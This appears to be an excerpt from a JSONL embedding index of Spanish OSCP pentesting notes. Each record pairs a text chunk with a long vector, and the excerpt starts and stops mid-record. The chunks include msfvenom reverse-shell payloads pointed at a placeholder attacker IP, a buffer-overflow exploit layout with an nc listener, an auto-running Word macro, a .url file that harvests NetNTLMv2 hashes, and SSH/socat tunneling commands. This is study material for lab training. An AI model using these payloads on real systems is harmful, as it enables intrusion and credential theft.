0.03298, 0.01422, 0.03882, 0.08362, -0.00265, 0.00245, 0.01249, 0.0511, -0.05084, 0.02617, 0.11414, 0.051, -0.02996, -0.00975, 0.03485, 0.0504, -0.02065, -0.04016, 0.03021, 0.04571, 0.05988, 0.02354, -0.07019, 0.01005, -0.0366, -0.01699, -0.06582, -0.04929, 0.03199, -0.00161, -0.02366, 0.0088, -0.10953, -0.04549, -0.10346, 0.03713, -0.03217, 0.0174, -0.07269, 0.00981, -0.00537, 0.01103, -0.02709, 0.05066, 0.00296, -0.00778, 0.01599, -0.02892, 0.02606, 0.01505, -0.02874, -0.01166, -0.01076, -0.01257, -0.02921, -0.00422, 0.01077, 0.0115, -0.00828, 0.01133, -0.0737, 0.02837, -0.02014, -0.02921, 0.04873, -0.02432, 0.04257, 0.07093, 0.0537, 0.03667, -0.00554, -0.07029, -0.0748, 0.05205, -0.02798, 0.00581, 0.00344, -0.01199, 0.00519, 0.04846, -0.00405, 0.00337, 0.057, 0.02311, -0.01482, 0.02798, 0.03464, -0.06222, -0.00248, -0.00373, -0.01717, 0.02936, 0.00594, -0.02725, -0.02106, 0.00139, -0.04732, -0.05422, 0.09049, -0.01268, -0.08635, -0.04158, -0.03644, -0.03257, 0.06298, 0.04998, -0.00864, -0.01734, 0.0054, -0.04916, -0.03102, 0.0592, 0.04629]} +{"tipo": "metodologia", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "texto": "### 6. Shellcode con msfvenom\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 EXITFUNC=thread \\\n -b \"\\x00\\x0a\\x0d\" -f py -v shellcode", "v": [0.01691, -0.24271, -0.07161, 0.04071, -0.02009, -0.19645, -0.1255, -0.1012, 0.03253, 0.09153, -0.06274, 0.00208, 0.05762, -0.0409, -0.042, -0.04595, -0.09619, -0.1246, -0.0346, -0.08335, 0.01176, 0.05326, -0.17942, -0.10085, 0.0092, 0.17385, -0.06594, -0.03457, -0.13373, -0.12701, 0.05945, -0.15404, 0.00389, 0.07452, 0.0006, -0.00281, 0.03308, 0.03921, -0.0072, 0.2115, 0.01344, 0.10225, -0.14306, 0.11861, 0.1816, -0.12859, -0.01697, 0.04409, 0.02061, -0.0856, -0.1064, -0.13964, -0.15827, 0.0622, -0.05861, 0.02771, 0.15208, -0.01148, -0.04617, 0.01847, 0.03234, 0.00216, -0.06689, -0.14076, 0.01423, 0.019, 0.08098, -0.03669, -0.0462, 0.01998, -0.08376, 0.01534, -0.04766, -0.02244, 0.04842, 0.01654, 0.03407, -0.04199, 0.06473, 0.08029, -0.06566, -0.04648, -0.03609, -0.06055, -0.05622, -0.08808, 0.06413, -0.05002, 0.01652, -0.07738, 0.04161, -0.01052, -0.05624, 0.04538, 0.05516, -0.11531, -0.03353, 0.03526, -0.02007, 0.03584, 0.01028, 0.04973, -0.04897, 0.09628, 0.09156, -0.01554, 0.043, 0.05154, -0.03398, 0.11408, 0.06414, -0.04963, -0.02143, -0.05556, -0.048, -0.08549, -0.09311, 0.00766, 0.09882, 0.00784, -0.02876, -0.01906, -0.01583, 0.12335, -0.03468, -0.01893, -0.00151, 0.10733, 0.00184, 0.0003, -0.00223, -0.02257, 0.00946, 0.03185, -0.02765, 0.10339, 0.00015, -0.00027, -0.01408, -0.02852, 0.1078, 0.08218, -0.00366, 0.09009, 0.01159, 0.0186, 0.01926, -0.05674, -0.04211, 0.00568, 0.08459, -0.01378, -0.00352, -0.02197, -0.06857, 0.01104, 0.0687, 0.02303, 0.00139, -0.05038, -0.06691, -0.023, -0.00337, 0.03097, 0.00845, -0.02169, -0.01489, 0.06899, 0.0626, -0.0319, 0.0033, 0.0148, 0.03858, -0.01094, 0.00115, -0.00559, -0.01955, -0.03136, -0.00972, -0.02082, 0.01543, -0.03456, 0.04439, -0.02057, 0.00656, 0.00127, 0.02465, 0.04776, 0.00029, -0.01438, -0.00244, 0.04003, -0.02449, 0.00502, -0.02539, 0.0092, 0.0005, -0.08784, 0.01178, -0.03334, -0.03019, 0.07983, 0.07838, -0.07307, 0.03475, -0.02141, -0.018, 0.05151, 0.00028, -0.03322, -0.02954, -0.03385, 0.00864, 0.03741, -0.0211, -0.00981, 0.04398, 0.01795, 0.02579, 0.02216, -0.0344, 0.02016, 0.02957, 0.01442, 0.01008, 0.00313, -0.00282, -0.02961, 0.0471, -0.01289, 0.00478, -0.00295, -0.02563, 0.00422, 0.06399, 0.00904, -0.05261, -0.04528, -0.02973, -0.03818, -0.01129, 0.02882, -0.02105, -0.11298, 0.00187, -0.0375, -0.05974, 0.04908, 0.01251, -0.00275, -0.05808, -0.00964, -0.07258, -0.04416, -0.0268, 0.0076]} +{"tipo": "metodologia", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "texto": "### 7. Exploit final\n```\nbuffer = prefix + b\"A\"*offset + jmp_esp + b\"\\x90\"*16 + shellcode\n```\nLevanta `nc -lvnp 443` (Reverse shell) y lanza. NOP sled (`\\x90`*16) da margen al decoder.\n\nRelacionado: Metasploit · Reverse shell · Exploits conocidos · OSCP MOC", "v": [-0.01146, -0.14683, -0.13318, -0.05678, -0.0563, -0.16641, -0.07884, -0.09449, -0.06219, 0.00704, -0.069, -0.08636, -0.03888, -0.11826, 0.04395, 0.03254, -0.22772, -0.03656, -0.03933, -0.02235, -0.02208, -0.05855, -0.18212, -0.10036, 0.06267, 0.16843, -0.07803, 0.13917, 0.01721, -0.04465, -0.12232, -0.07969, -0.0826, 0.10729, -0.06518, 0.05978, 0.06637, -0.1149, -0.02921, 0.22142, -0.0616, 0.03252, -0.16102, 0.14621, 0.15711, -0.07003, -0.00657, 0.07746, -0.06604, -0.10576, -0.04015, -0.00863, -0.1832, 0.0478, 0.00207, -0.02875, 0.10806, 0.0665, -0.01318, 0.07511, 0.04041, -0.00084, -0.01941, -0.12817, 0.06279, -0.05289, 0.03515, -0.12248, -0.139, 0.02466, -0.11294, 0.03284, -0.00189, -0.02445, 0.03634, -0.01966, 0.07214, -0.09759, 0.14362, 0.07608, -0.13002, -0.06599, -0.02855, -0.04098, 0.02064, -0.00023, 0.05276, -0.04204, 0.00395, -0.02634, 0.06469, -0.00512, -0.00341, 0.06428, 0.00061, -0.10708, 0.01845, 0.08093, 0.01588, 0.0745, 0.07406, 0.09199, -0.01549, 0.03061, 0.07465, 0.04809, -0.04368, -0.03064, 0.06792, 0.08399, 0.08964, -0.05915, 0.05692, -0.02895, 0.04396, 0.01197, -0.04532, 0.01281, 0.05023, 0.03075, 0.00494, -0.01959, 0.01589, 0.03747, 0.0271, -0.07766, -0.04611, 0.03441, -0.02, -0.02516, -0.06327, 0.00244, 0.00173, 0.03933, -0.003, 0.02015, 0.08469, 0.01159, 0.04459, -0.0064, 0.03068, 0.04177, 0.02405, 0.09844, 0.03109, 0.06058, -0.00052, -0.04749, -0.01055, 0.01804, 0.00978, 0.03169, 0.00236, 0.01067, -0.00724, -0.06855, -0.01833, 0.06242, -0.02676, 0.00661, -0.01407, 0.02964, -0.03176, 0.06424, -0.01594, -0.06503, 0.02266, -0.03787, -0.00537, -0.05638, 0.01635, 0.02377, 0.05637, -0.01255, -0.07348, -0.03108, 0.02662, -0.05039, -0.03381, -0.00512, 0.01394, -0.00529, 0.05688, 0.00785, -0.0365, 0.00177, 0.03639, 0.00547, -0.01543, -0.02605, 0.05396, -0.02513, -0.01124, -0.00182, 0.01129, 0.01538, -0.01657, -0.08957, 0.02338, 0.00228, 0.02249, -0.01305, 0.02223, -0.08508, -0.01772, -0.02982, -0.05745, 0.04164, -0.03329, -0.02407, 0.0049, -0.06087, 0.04529, 0.03675, -0.04826, 0.00388, 0.00301, 0.04467, 0.02698, -0.02209, 0.01112, 0.0353, 0.0339, 0.04285, -0.00472, 0.02204, 0.01855, -0.0397, 0.01136, -0.04463, -0.01489, 0.01063, -0.01125, -0.02872, 0.01488, -0.05342, -0.05879, 0.03801, -0.08245, -0.07897, 0.01619, 0.00554, -0.01507, -0.05177, -0.03806, 0.01798, -0.02423, 0.00739, 0.02867, -0.02022, -0.0555, -0.05519, -0.06251, -0.0608, 0.00957, 0.0528]} +{"tipo": "metodologia", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "texto": "# Client-side attacks\n\n> Atacas a un **usuario** (que abre un documento/enlace), no a un servicio. Fuente: oscp.trastero.org/clientside.", "v": [0.03868, -0.05761, -0.11511, -0.17855, 0.05115, -0.16423, 0.01696, -0.07288, -0.14268, 0.09989, -0.12348, -0.27997, -0.03499, -0.05106, 0.03215, -0.12359, 0.15717, -0.03487, 0.16264, -0.05551, -0.01184, 0.00492, -0.03017, 0.01295, -0.04607, -0.03387, -0.00918, -0.06398, -0.02166, -0.00985, -0.01361, -0.08995, -0.05172, 0.02914, 0.01637, -0.06371, -0.08783, 0.0317, 0.0494, 0.06736, 0.00139, 0.02212, -0.11628, 0.14341, -0.00711, 0.00344, 0.01879, 0.05179, 0.07611, 0.04113, -0.00624, -0.19883, -0.2543, 0.02912, -0.08181, 0.06013, 0.10782, -0.06206, -0.01247, 0.01501, 0.04149, 0.11567, -0.00027, -0.0465, 0.0596, -0.05534, 0.04204, -0.00781, 0.01185, -0.01974, -0.12898, 0.06611, -0.02065, -0.08304, 0.00108, -0.12256, 0.01524, -0.05371, 0.08133, 0.10834, -0.01146, 0.02743, -0.11335, -0.10141, -0.06167, 0.03464, 0.1033, 0.06564, -0.01096, -0.04671, 0.15177, 0.09921, -0.03084, -0.00606, -0.04511, -0.05455, -0.00225, -0.08626, 0.0387, -0.03157, 0.03349, 0.10375, -0.03636, 0.01578, 0.04923, -0.0025, -0.01581, -0.0984, 0.00264, 0.03445, -0.00889, 0.01577, 0.08092, 0.05929, -0.01904, -0.0041, -0.0387, 0.01225, -0.03214, -0.02203, 0.03741, -0.04085, 0.00207, 0.05057, -0.0764, 0.00482, 0.00027, 0.04883, -0.02823, -0.04043, -0.05121, -0.00271, -0.0425, 0.04252, 0.03043, -0.02879, 0.05347, -0.1112, 0.08786, 0.06626, 0.04319, -0.00548, -0.07493, 0.08193, 0.07749, -0.05754, 0.00914, -0.03268, -0.07346, 0.01367, 0.01363, 0.02936, 0.00768, -0.03202, -0.01695, -0.0495, -0.01443, -0.08422, -0.08741, 0.06737, 0.06169, 0.07213, 0.0858, 0.05226, -0.01498, -0.02068, 0.01423, -0.02252, 0.01546, -0.01848, 0.03346, -0.01316, -0.04215, -0.09607, 0.03534, -0.07523, -0.01973, -0.02767, -0.03449, 0.01178, 0.00276, -0.05592, 0.00041, 0.06393, -0.03898, 0.01765, 0.03233, -0.01439, -0.01902, -0.01673, -0.01224, 0.01126, -0.05809, 0.01438, 0.07368, -0.03872, -0.06036, 0.01393, -0.01855, 0.00029, -0.07083, -0.0284, -0.03099, 0.03845, -0.03102, 0.01911, -0.00213, 0.03213, -0.05591, 0.0265, 0.0631, -0.0542, 0.12072, -0.03273, -0.08163, -0.02506, 0.02293, 0.03998, 0.05037, -0.0131, -0.02452, 0.01466, 0.01478, 0.0517, 0.01863, -0.02616, 0.02798, -0.08152, -0.02825, -0.00671, 0.01696, -0.03108, 0.00166, -0.08758, -0.02227, -0.01006, 0.0302, -0.03651, -0.0185, -0.04923, 0.00665, 0.01247, -0.05455, 0.00123, -0.01571, -0.04606, -0.02731, -0.01981, -0.02261, -0.03808, -0.02498, -0.06311, -0.00032, -0.05045, 0.05393, -0.01964]} +{"tipo": "metodologia", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "texto": "## Macro de Word (VBA)\n```bash\nmsfvenom -p windows/shell_reverse_tcp LHOST=TU_IP LPORT=443 -f hta-psh -o evil.hta # → msfvenom\npython3 split.py # parte el payload codificado en trozos de 50 chars para el VBA\n```\n- VBA con `Sub AutoOpen()` y `Sub Document_Open()` que reconstruye y ejecuta el PowerShell.\n- **Guardar como \"Documento de Word 97-2003\" (.doc)** para que conserve la macro.\n- Verificar: `olevba evil.doc`.", "v": [0.05989, -0.24204, -0.0638, -0.05706, 0.02962, -0.0792, 0.08163, -0.13565, 0.04798, 0.03185, -0.05007, -0.08906, 0.08933, 0.01502, -0.0341, 0.00158, 0.0331, -0.2027, -0.07491, -0.02038, 0.03778, 0.04457, -0.06968, -0.02114, 0.06836, 0.14431, -0.16979, 0.08068, -0.23706, -0.12039, 0.07468, -0.02374, -0.05514, 0.04503, -0.05709, 0.10527, 0.05148, 0.02782, 0.05362, 0.26047, -0.02574, 0.08613, -0.06786, 0.18772, 0.07748, -0.13948, 0.04601, 0.08169, -0.05224, -0.03147, -0.14365, -0.07264, -0.08246, -0.00511, 0.02743, -0.07166, 0.04931, -0.03805, 0.00717, -0.00468, 0.00847, 0.01695, -0.06454, -0.12692, -0.0057, -0.02506, 0.05092, -0.04683, -0.02659, 0.08012, -0.10932, 0.04753, 0.04641, -0.02168, -0.00772, -0.07199, -0.01865, -0.06757, 0.09471, 0.07802, -0.05532, -0.08013, -0.07647, -0.04245, 0.01435, -0.05883, 0.08017, -0.03087, 0.08201, -0.03587, 0.10238, 0.00768, -0.02878, 0.09918, 0.02498, -0.11381, -0.00793, 0.02623, -0.02924, -0.01122, 0.03652, -0.00942, -0.02991, 0.02347, 0.02695, 0.06452, 0.0167, 0.01723, -0.01556, 0.07606, 0.10919, -0.08431, 0.03386, -0.06391, -0.00548, -0.10194, -0.06023, 0.03199, 0.04199, -0.04698, 0.00361, -0.03866, -0.06253, 0.15836, -0.06466, -0.06899, -0.0189, 0.08352, -0.06491, 0.01519, 0.01965, 0.03736, -0.00992, -0.04819, 0.03693, 0.00067, 0.0515, -0.06131, -0.01175, -0.03798, 0.06516, 0.01832, 0.03155, 0.07151, 0.02532, 0.02603, 0.01549, -0.03596, -0.04621, 0.01792, 0.06173, 0.05928, 0.00954, -0.02402, -0.0226, 0.03845, 0.0759, 0.00562, -0.02383, 0.03272, -0.01694, 0.04185, -0.00691, -0.02239, -0.02989, -0.03987, -0.04387, -0.05102, 0.08469, -0.04334, 0.04559, -0.03653, -0.04036, -0.02394, 0.00143, -0.09033, 0.03639, -0.02847, 0.00954, -0.00263, 0.00756, -0.08004, -0.00235, 0.05803, -0.03513, 0.01341, 0.09073, -0.01493, 0.01273, -0.04948, 0.00039, 0.04358, -0.03696, -0.0435, -0.00479, -0.01232, -0.02367, -0.0572, 0.03496, -0.04032, -0.06272, 0.03004, 0.02529, -0.04314, 0.0054, 0.01266, -0.04956, 0.03791, -0.00648, 0.00995, -0.00266, 0.02383, 0.03067, 0.02371, -0.02445, -0.05917, 0.00044, 0.04192, -0.00046, -0.0086, -0.01986, 0.09405, 0.05782, 0.00923, 0.00136, -0.06034, 0.03402, -0.05044, 0.04925, -0.00378, -0.03103, 0.06724, 0.00094, -0.01381, 0.03494, 0.00173, -0.01519, -0.03888, -0.01176, -0.03027, -0.0157, 0.05554, -0.03004, -0.08673, -0.02372, -0.04798, -0.05073, 0.01701, -0.02621, 0.02022, -0.04474, -0.02215, -0.03289, -0.07541, -0.0172, -0.07681]} +{"tipo": "metodologia", "herramienta": "Client-side attacks", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Client-side attacks.md", "texto": "## Acceso directo malicioso (.url / .lnk)\n```ini\n[InternetShortcut]\nURL=file://TU_IP\nIconFile=\\\\TU_IP\\SERVER\\%USERNAME%.icon\nIconIndex=1\n```\n- El `IconFile` con ruta **UNC** fuerza al cliente a autenticar contra tu SMB → **capturas su hash NetNTLMv2**.\n```bash\nimpacket-smbserver -smb2support SERVER $(pwd) # o Responder → Herramientas (índice)\n```\n- El hash capturado → Cracking de contraseñas (`hashcat -m 5600`) o relay.\n\nRelacionado: AV evasion · Cracking de contraseñas · Authentication attacks · OSCP MOC", "v": [-0.1005, -0.21616, -0.0425, -0.14143, 0.03646, -0.24947, -0.11348, -0.0638, -0.06303, 0.13987, -0.09893, -0.10055, 0.06569, -0.07031, -0.04178, 0.13525, -0.06723, -0.0661, 0.03724, -0.00201, 0.07185, 0.09828, -0.10842, -0.03125, 0.0047, 0.06081, -0.18055, 0.16979, -0.07109, -0.10428, -0.03901, -0.03194, -0.04635, 0.07738, -0.07182, -0.10913, -0.00119, 0.10664, 0.04926, 0.20905, 0.0982, 0.04602, -0.16401, 0.05686, 0.09308, -0.05019, 0.01602, -0.01772, 0.0179, -0.10414, -0.03884, -0.09334, -0.18711, -0.06922, -0.11262, -0.02156, 0.09785, 0.04149, -0.01834, 0.00264, -0.04319, 0.08362, -0.03587, -0.0295, 0.04092, -0.05688, 0.00584, -0.07006, -0.09904, 0.00994, -0.0272, 0.05332, 0.01231, -0.04029, 0.05783, -0.00265, 0.05868, -0.01019, 0.1035, 0.12053, -0.0795, -0.04849, -0.02585, 0.00325, -0.12563, -0.02117, 0.08474, -0.14037, 0.01281, -0.03365, 0.11929, 0.04152, -0.03318, 0.03991, 0.00489, -0.08891, -0.02053, -0.00178, 0.0356, -0.03095, -0.04779, 0.10368, -0.11027, 0.0457, 0.08422, 0.02309, 0.05643, 0.00222, -0.00956, 0.03065, 0.07173, -0.00422, 0.04366, -0.06217, -0.04878, -0.03, -0.03658, -0.06172, 0.06438, 0.00784, -0.01737, -0.05925, 0.00921, 0.04572, -0.04597, 0.00202, -0.03482, 0.05831, 0.00305, -0.06057, -0.01941, -0.00688, -0.03042, -0.03872, 0.00219, 0.03769, 0.01889, -0.06533, -0.02204, -0.02582, 0.04471, -0.03431, -0.03482, 0.03068, 0.1179, 0.02788, 0.05951, -0.07138, -0.07391, -0.00333, 0.06661, 0.04308, 0.02222, -0.03678, 0.03584, 0.04443, -0.03689, -0.07143, -0.0171, 0.07488, -0.00866, 0.03327, 0.05172, 0.05326, -0.04548, -0.04796, -0.02312, 0.01312, 0.04447, -0.03609, 0.00508, 0.04211, -0.01145, -0.04495, -0.00471, -0.09796, 0.04185, -0.04339, 0.01046, -0.04612, 0.00397, -0.02745, 0.05862, 0.01857, -0.00107, -0.04069, 0.07558, 0.03616, -0.01503, -0.01362, 0.02871, -0.00029, -0.05586, 0.062, 0.00585, -0.01145, 0.0166, -0.01602, 0.05618, -0.01545, -0.02894, -0.0525, -0.00909, -0.04173, 0.0287, -0.00215, -0.01932, -0.02057, -0.04386, -0.03493, -0.00163, 0.01343, 0.04438, -0.0682, -0.02514, -0.02788, 0.00742, 0.02653, 0.01501, -0.02256, -0.04218, 0.08697, 0.02548, 0.06283, 0.00779, 0.02971, 0.0236, -0.02251, 0.05921, 0.01996, -0.01721, 0.02572, -0.03681, -0.03849, 0.05468, -0.01417, -0.0405, 0.00032, -0.04756, -0.01447, -0.00052, 0.02387, 0.00472, -0.07572, -0.02576, -0.04566, -0.04771, 0.023, 0.03366, -0.00196, -0.02898, -0.00399, -0.00981, -0.0233, 0.01001, -0.02456]} +{"tipo": "metodologia", "herramienta": "Tunneling", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "texto": "# Tunneling y port forwarding\n\n> Reenviar puertos y montar proxies para alcanzar redes internas. Alternativas a Pivoting ligolo-ng. Fuente: oscp.trastero.org/tunneling.", "v": [0.12475, -0.11722, -0.19207, -0.15528, 0.00852, 0.04416, 0.14862, -0.0839, -0.00055, 0.08965, -0.02512, 0.01046, 0.11918, 0.05597, 0.00663, -0.01509, -0.0232, 0.01298, 0.15466, -0.09478, -0.21168, 0.03541, -0.13197, -0.07096, 0.15885, 0.01662, -0.03504, -0.07231, -0.13285, -0.07368, -0.0318, -0.02795, 0.15039, 0.04682, -0.0443, -0.14792, 0.03611, 0.15023, 0.09657, 7e-05, 0.04237, 0.00095, -0.06353, 0.06111, 0.10276, -0.12177, -0.01035, -0.0912, 0.0475, 0.00329, 0.03291, -0.01293, -0.17778, 0.00369, -0.01443, 0.01192, 0.02087, -0.07501, 0.0345, -0.0723, 0.02157, 0.08157, -0.06417, -0.06784, 0.00678, -0.05008, -0.05234, 0.02078, -0.19185, 0.0303, -0.04218, 0.07041, 0.04307, 0.13106, 0.00458, -0.08572, 0.03553, -0.02706, 0.07054, 0.12085, -0.01319, 0.01946, 0.03859, 0.00279, 0.01239, -0.01732, -0.09175, -0.00679, 0.05157, -0.04503, -0.05197, -0.05654, -0.03346, 0.00994, 0.05522, -0.05589, -0.07736, 0.03548, 0.00165, -0.14746, -0.01719, 0.06027, -0.10977, 0.0639, 0.03315, -0.00743, -0.04627, -0.1176, 0.07544, 0.06054, 0.07631, 0.09465, 0.08066, -0.05962, -0.01544, -0.01911, -0.01114, -0.02283, -0.01425, 0.03921, -0.008, -0.06498, 0.0152, 0.05204, -0.03201, -0.0119, 0.07742, 0.07478, 0.06491, 0.04947, 0.02147, -0.00104, -0.07107, -0.08222, -0.07664, -0.02138, 0.10512, -0.0897, 0.05276, -0.00168, -0.04606, -0.06752, -0.03967, -0.00595, 0.01043, 0.04694, -0.03795, -0.02692, -0.01942, -0.02646, -0.00762, 0.03961, -0.04396, -0.043, 0.01134, -0.01155, -0.02842, 0.00921, -0.134, 0.09672, 0.01506, 0.00208, -0.02795, -0.06233, -0.03877, -0.03165, -0.07819, -0.03893, 0.02561, -0.07246, 0.00486, 0.05501, -0.09619, -0.10137, 0.03625, -0.01819, -0.03025, -0.04242, -0.04362, 0.03151, -0.01944, -0.0438, 0.00326, 0.0188, -0.0242, -0.03332, 0.01691, -0.03141, 0.02487, 0.04956, -0.03736, -0.01858, -0.0542, 0.07018, 0.02504, -0.01269, -0.01129, -0.05337, -0.00558, 0.00366, -0.03617, 0.02593, 0.03732, 0.0026, -0.03182, -0.00575, -0.03995, -0.05152, -0.01095, 0.06015, 0.06369, -0.05319, 3e-05, -0.04702, 0.00512, 0.05248, 0.0327, 0.04079, -0.02552, 0.02236, -0.06552, 0.05689, 0.00205, 0.03337, -0.07199, 0.02996, -0.0218, 0.05423, -0.04882, 0.00901, 0.08522, -0.02757, -0.0277, -0.0525, -0.00064, -0.03624, -0.06273, 0.0212, 0.02354, 0.0275, 0.0299, -0.05961, 0.0229, 0.06099, -0.01878, -0.00368, 0.00381, 0.02498, -0.00659, -0.01206, -0.03627, -0.00138, -0.05464, -0.04268, 0.05082, -0.00669]} +{"tipo": "metodologia", "herramienta": "Tunneling", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "texto": "## SSH (el más portable)\n```bash\nssh -L 8080:127.0.0.1:80 user@pivot # LOCAL: tu :8080 → servicio interno\nssh -R 3390:127.0.0.1:3389 user@kali # REMOTE: expone el RDP del pivot en tu :3390\nssh -D 1080 user@pivot # DYNAMIC: proxy SOCKS en tu :1080", "v": [0.04905, -0.21788, -0.14017, -0.0712, 0.05379, -0.22862, -0.17112, -0.12304, 0.08281, 0.17429, 0.0258, -0.07033, 0.12882, -0.22002, -0.07038, -0.16393, -0.09625, 0.00509, -0.09375, 0.10873, 0.04485, 0.14012, -0.06367, -0.00073, 0.15688, 0.07555, -0.01355, 0.1291, -0.06888, -0.02663, 0.11016, -0.03342, -0.06624, 0.00499, 0.00406, -0.07083, -0.01879, 0.02678, 0.0807, 0.18902, 0.07443, -0.00384, -0.0647, 0.0839, 0.18015, -0.07067, -0.00064, -0.00493, -0.02701, -0.08918, -0.10707, -0.04377, -0.12552, 0.07157, 0.02746, 0.06774, 0.16073, -0.1053, -0.00604, -0.03643, -0.03707, -0.00112, -0.07217, -0.07119, 0.06371, -0.04999, -0.0104, -0.10267, -0.09444, 0.09355, -0.12322, 0.04916, 0.03683, -0.04207, 0.06665, -0.00377, 0.04269, 0.08113, 0.01738, 0.05687, -0.05494, -0.04985, -0.00862, -0.03145, -0.05068, 0.02354, 0.05358, 0.00205, 0.00957, -0.01182, 0.05991, 0.02498, 0.0371, 0.03675, 0.00682, -0.05561, -0.03715, 0.07393, -0.00865, -0.07142, -0.00965, 0.02701, -0.078, 0.06146, 0.07913, -0.05897, -0.03624, -0.03378, -0.00088, 0.03452, 0.07106, -0.01125, 0.07662, -0.02559, -0.04654, -0.01765, -0.06099, 0.03952, 0.04074, -0.018, 0.02425, -0.00385, 0.02266, -0.01016, -0.01017, -0.08276, 0.015, 0.03669, 0.00235, 0.00539, 0.07658, -0.01839, 0.02747, -0.04258, 0.03747, 0.06154, 0.05929, 0.01831, -0.00542, -0.00518, 0.07084, 0.06351, 0.00619, -0.00315, 0.03182, -0.01151, 0.05188, -0.08948, -0.06968, 0.02647, 0.06173, 0.06926, -0.06362, 0.02579, -0.00097, 0.06936, -0.00253, -0.08586, -0.06707, 0.01086, 0.03296, -0.00157, 0.05194, 0.03559, -0.02065, 0.01443, -0.0327, -0.00851, 0.03701, -0.0451, 0.00166, 0.02068, -0.06869, -0.05645, -0.03458, -0.08506, 0.00276, -0.06035, -0.06017, 0.00338, 0.01037, -0.05155, 0.05228, 0.02761, 0.05009, 0.03408, 0.01262, -0.00624, 0.04394, -0.01711, 0.00468, 0.06541, -0.03346, 0.00573, 0.02104, -0.02493, -0.00118, -0.10062, -0.02912, -0.02414, -0.04738, 0.07489, -0.02004, -0.00316, -0.02239, -0.05108, -0.04681, -0.02283, 0.0084, -0.02554, 0.01951, -0.05806, 0.03884, 0.00381, -0.02662, -0.02105, 0.00357, 0.01711, 0.01856, 0.00271, -0.03324, 0.00233, 0.00098, 0.05614, -0.01241, 0.00331, 0.01622, -0.03396, 0.02574, -0.02896, 0.02258, 0.0091, 0.02855, -0.01907, 0.01272, -0.04279, 0.04975, 0.02159, 0.00151, -0.08784, 0.0121, 0.00074, -0.00436, -0.01436, -0.02554, -0.00249, -0.02716, -0.02294, -0.0109, -0.05843, 0.00507, -0.07837, -0.0251, -0.04084, 0.00578, -0.00656]} +{"tipo": "metodologia", "herramienta": "Tunneling", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "texto": "# luego: proxychains (configura socks en /etc/proxychains4.conf)\n```", "v": [0.08081, 0.03625, -0.18522, -0.0898, 0.16143, -0.27476, 0.07841, -0.05017, -0.01992, -0.01463, -0.08158, 0.03484, -0.03838, -0.11282, -0.02042, -0.04033, 0.0829, -0.09925, -0.01964, 0.11193, -0.06358, -0.03901, -0.1483, -0.07987, 0.01763, 0.00883, 0.10538, 0.01721, -0.17189, -0.01632, -0.00226, 0.00772, 0.13132, 0.12262, -0.08934, -0.0069, -0.05737, 0.05957, 0.04135, 0.12273, -0.01493, -0.10777, -0.14127, 0.07283, 0.05568, -0.0745, -0.02146, -0.01931, 0.01337, 0.0085, -0.06418, -0.12791, -0.16849, 0.08996, 0.00119, -0.13743, 0.10478, -0.12737, -0.01034, -0.05849, -0.0469, -0.03523, -0.00723, -0.06776, 0.01899, 0.03646, -0.10011, -0.05861, -0.1247, 0.06512, -0.03935, -0.02235, -0.009, -0.07661, 0.06635, -0.05237, 0.04882, -0.0746, 0.10976, 0.10478, -0.0243, -0.01249, -0.02854, -0.05866, -0.06733, -0.06452, 0.01871, -0.02305, 0.08034, -0.01526, 0.04955, 0.05947, 0.01812, -0.09981, 0.07147, 0.00893, 0.06527, 0.00442, -0.0277, -0.08592, 0.08717, 0.02272, -0.03422, 0.08073, -0.01667, 0.00453, -0.05434, 0.00886, -0.00591, 0.01503, 0.11201, -0.01057, 0.0857, -0.06417, 0.04791, 0.02827, -0.03612, 0.09486, 0.07005, -0.03275, 0.06114, -0.04789, -0.0976, -0.00877, -0.06812, 0.04647, -0.12178, 0.05046, -0.00539, 0.01162, 0.03054, -0.08967, -0.04086, -0.05617, -0.08712, 0.05734, 0.09736, -0.10737, 0.00709, -0.13934, 0.06136, 0.00205, -0.03868, -0.02071, 0.07421, 0.07085, 0.01208, 0.04532, -0.00161, -0.0329, 0.00513, 0.0258, -0.0216, 0.04051, -0.08752, -0.03727, -0.06809, -0.04804, -0.04824, -0.0044, -0.02957, -0.04243, 0.04703, 0.01785, 0.03327, -0.02161, 0.02921, -0.02148, 0.01946, 0.05758, -0.04999, 0.03373, 0.03909, -0.07503, -0.0472, -0.0401, -0.06358, -0.0505, -0.02962, -0.03234, 0.008, -0.0492, 0.02457, -0.04024, -0.01234, -0.02729, 0.01441, 0.01279, -0.00928, 0.12748, 0.01398, 0.03777, 0.02434, 0.02581, 0.05482, 0.03167, 0.01206, -0.10498, -0.05509, -0.0009, -0.00278, -0.01388, 0.02772, -0.02069, -0.01149, -0.00666, -0.02337, -0.04618, 0.02433, 0.06264, 0.029, -0.05432, 0.0186, 0.05795, -0.0206, -0.03743, 0.00816, 0.05317, -0.05549, -0.0279, -0.03, 0.04812, 0.04094, -0.0353, 0.03387, 0.01185, 0.04641, -0.00822, 0.03874, -0.0443, -0.00811, -0.01053, 0.00279, -0.02354, -0.00804, -0.04931, 0.02209, -0.01769, 0.02158, 0.03971, -0.00225, 0.01826, -0.00528, -0.0587, -0.05997, -0.01257, -0.02209, 0.04068, -0.02589, -0.00965, -0.03525, -0.00885, -0.0044, -0.0647, -0.01587, 0.02611]} +{"tipo": "metodologia", "herramienta": "Tunneling", "perfil": "PENTESTERS", "tema": "avanzado", "fichero": "conocimiento/08 - Avanzado/Tunneling.md", "texto": "## socat (redirección simple)\n```bash\nsocat TCP-LISTEN:8080,fork TCP:192.168.5.10:80\n```", "v": [-0.11703, -0.15206, 0.04544, 0.0483, 0.02094, -0.24183, -0.02131, 0.1388, 0.10976, 0.20541, -0.03504, 0.00566, 0.03809, 0.01038, 0.02715, 0.0195, -0.18715, 